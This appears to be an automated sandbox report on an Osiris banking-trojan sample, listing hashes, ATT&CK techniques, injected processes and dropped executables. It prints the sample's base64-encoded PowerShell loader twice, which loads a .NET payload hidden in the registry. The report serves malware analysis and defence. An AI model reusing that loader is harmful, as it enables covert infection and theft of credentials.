osiris | 4282eb3d9f7aad6faf333be7700b1926dfac7b1827515706db6a29b40a6cdb45

General

Target

payload-de.js
Size

2.8MB
MD5

6f1069a90a63748bdb3098301993b38b
SHA1

547d848aa7044051ac69c4004069d03b38a25c15
SHA256

4282eb3d9f7aad6faf333be7700b1926dfac7b1827515706db6a29b40a6cdb45
SHA512

ccf12209455b03ed526c7d05f49463f7532daaec294e861724173de05433d031e9a12f4ca82f05e10ddc50322fa8db76fd5853591f6a80c03ec2a27595185434

Score

10^/10

osiris banker botnet spyware

Malware Config

Signatures

Osiris
banker botnet osiris
Executes dropped EXE 3 IoCs

Processes:

Admin.exeGetX64BTIT.exe1577599147.exe

pid process

3960 Admin.exe
1780 GetX64BTIT.exe
776 1577599147.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 api.ipify.org
17 api.ipify.org
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3360 set thread context of 3960 3360 powershell.exe Admin.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
3960	Admin.exe
1780	GetX64BTIT.exe
776	1577599147.exe

flow	ioc
16	api.ipify.org
17	api.ipify.org

description	pid	process	target process
PID 3360 set thread context of 3960	3360	powershell.exe	Admin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

Admin.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\IntelliForms\Storage2	Admin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeAdmin.exe

pid	process
3360	powershell.exe
3360	powershell.exe
3360	powershell.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe
3960	Admin.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3360 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Admin.exe

pid process

3960 Admin.exe

description	pid	process
Token: SeDebugPrivilege	3360	powershell.exe

pid	process
3960	Admin.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

wscript.execmd.exepowershell.exeAdmin.exe

description	pid	process	target process
PID 672 wrote to memory of 184	672	wscript.exe	cmd.exe
PID 672 wrote to memory of 184	672	wscript.exe	cmd.exe
PID 184 wrote to memory of 3360	184	cmd.exe	powershell.exe
PID 184 wrote to memory of 3360	184	cmd.exe	powershell.exe
PID 184 wrote to memory of 3360	184	cmd.exe	powershell.exe
PID 3360 wrote to memory of 3960	3360	powershell.exe	Admin.exe
PID 3360 wrote to memory of 3960	3360	powershell.exe	Admin.exe
PID 3360 wrote to memory of 3960	3360	powershell.exe	Admin.exe
PID 3360 wrote to memory of 3960	3360	powershell.exe	Admin.exe
PID 3360 wrote to memory of 3960	3360	powershell.exe	Admin.exe
PID 3360 wrote to memory of 3960	3360	powershell.exe	Admin.exe
PID 3360 wrote to memory of 3960	3360	powershell.exe	Admin.exe
PID 3360 wrote to memory of 3960	3360	powershell.exe	Admin.exe
PID 3360 wrote to memory of 3960	3360	powershell.exe	Admin.exe
PID 3360 wrote to memory of 3960	3360	powershell.exe	Admin.exe
PID 3960 wrote to memory of 1780	3960	Admin.exe	GetX64BTIT.exe
PID 3960 wrote to memory of 1780	3960	Admin.exe	GetX64BTIT.exe
PID 3960 wrote to memory of 776	3960	Admin.exe	1577599147.exe
PID 3960 wrote to memory of 776	3960	Admin.exe	1577599147.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js
1⤵
- Suspicious use of WriteProcessMemory
PID:672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
2⤵
- Suspicious use of WriteProcessMemory
PID:184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3360

C:\Users\Admin\AppData\Roaming\Admin.exe
"C:\Users\Admin\AppData\Roaming\Admin.exe"
4⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3960

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
5⤵
- Executes dropped EXE
PID:1780

C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe
"1577599147.exe"
5⤵
- Executes dropped EXE
PID:776

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Connection Proxy

Modify Registry

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Connection Proxy

1

T1090

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64btit.txt
MD5
e66e746f849f7abbcdae47bb95507d20

SHA1
24ae1f68f97c2e58a7ade40b0223b46e87b94077

SHA256
080a258cf8f83417af114097d40367eaae83ef8bf5113e3597a2b600b1788351

SHA512
82bfcf11b48c1de0772781795636a46b7c57afa62cf7dad37e48463851800526a0521e393dd5f09996a12c6e4be785db0b933e0d4eb82223aeae697634ac3966

Download Submit
C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe
MD5
9f385a9a69a4d9e18055743f0694976b

SHA1
2c2385ea964a33f803e96e364d4a05771c733921

SHA256
45f175bc165a3f8d9a05da48bdc4c1f234386588e0d003df094f72d019ae6216

SHA512
e9e78eb02bad22815648723138a7443da527779644ad9f9e776f91ba796b255c7556c5fe82ea526825c23ea376ed90d4dd5f31b026d2ff00605d8db9b0729c3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe
MD5
9f385a9a69a4d9e18055743f0694976b

SHA1
2c2385ea964a33f803e96e364d4a05771c733921

SHA256
45f175bc165a3f8d9a05da48bdc4c1f234386588e0d003df094f72d019ae6216

SHA512
e9e78eb02bad22815648723138a7443da527779644ad9f9e776f91ba796b255c7556c5fe82ea526825c23ea376ed90d4dd5f31b026d2ff00605d8db9b0729c3c

Download Submit
C:\Users\Admin\AppData\Roaming\Admin.exe
MD5
4db1ee663bd9f021da04edca144f4bd7

SHA1
709d318281ceabef246af0107b1db12f237b793a

SHA256
3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6

SHA512
ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

Download Submit
C:\Users\Admin\AppData\Roaming\Admin.exe
MD5
4db1ee663bd9f021da04edca144f4bd7

SHA1
709d318281ceabef246af0107b1db12f237b793a

SHA256
3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6

SHA512
ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

Download Submit
memory/184-3-0x0000000000000000-mapping.dmp

Download
memory/672-2-0x0000022D7C820000-0x0000022D7C927000-memory.dmp

Filesize
1.0MB

Download
memory/776-33-0x0000000000000000-mapping.dmp

Download
memory/1780-29-0x0000000000000000-mapping.dmp

Download
memory/3360-10-0x0000000007560000-0x0000000007561000-memory.dmp

Filesize
4KB

Download
memory/3360-11-0x0000000007D50000-0x0000000007D51000-memory.dmp

Filesize
4KB

Download
memory/3360-15-0x0000000008790000-0x0000000008791000-memory.dmp

Filesize
4KB

Download
memory/3360-16-0x0000000008700000-0x0000000008701000-memory.dmp

Filesize
4KB

Download
memory/3360-17-0x0000000009760000-0x0000000009761000-memory.dmp

Filesize
4KB

Download
memory/3360-18-0x0000000009470000-0x0000000009471000-memory.dmp

Filesize
4KB

Download
memory/3360-19-0x00000000096C0000-0x00000000096C1000-memory.dmp

Filesize
4KB

Download
memory/3360-20-0x0000000009D00000-0x0000000009D01000-memory.dmp

Filesize
4KB

Download
memory/3360-21-0x0000000009870000-0x0000000009872000-memory.dmp

Filesize
8KB

Download
memory/3360-22-0x00000000099B0000-0x0000000009B23000-memory.dmp

Filesize
1.4MB

Download
memory/3360-4-0x0000000000000000-mapping.dmp

Download
memory/3360-5-0x0000000074000000-0x00000000746EE000-memory.dmp

Filesize
6.9MB

Download
memory/3360-13-0x0000000008010000-0x0000000008011000-memory.dmp

Filesize
4KB

Download
memory/3360-12-0x0000000007DC0000-0x0000000007DC1000-memory.dmp

Filesize
4KB

Download
memory/3360-6-0x0000000006F70000-0x0000000006F71000-memory.dmp

Filesize
4KB

Download
memory/3360-7-0x0000000007630000-0x0000000007631000-memory.dmp

Filesize
4KB

Download
memory/3360-14-0x0000000007EA0000-0x0000000007EA1000-memory.dmp

Filesize
4KB

Download
memory/3360-9-0x0000000006FF2000-0x0000000006FF3000-memory.dmp

Filesize
4KB

Download
memory/3360-8-0x0000000006FF0000-0x0000000006FF1000-memory.dmp

Filesize
4KB

Download
memory/3960-27-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/3960-28-0x00000000006C0000-0x000000000075F000-memory.dmp

Filesize
636KB

Download
memory/3960-24-0x0000000000401698-mapping.dmp

Download
memory/3960-23-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads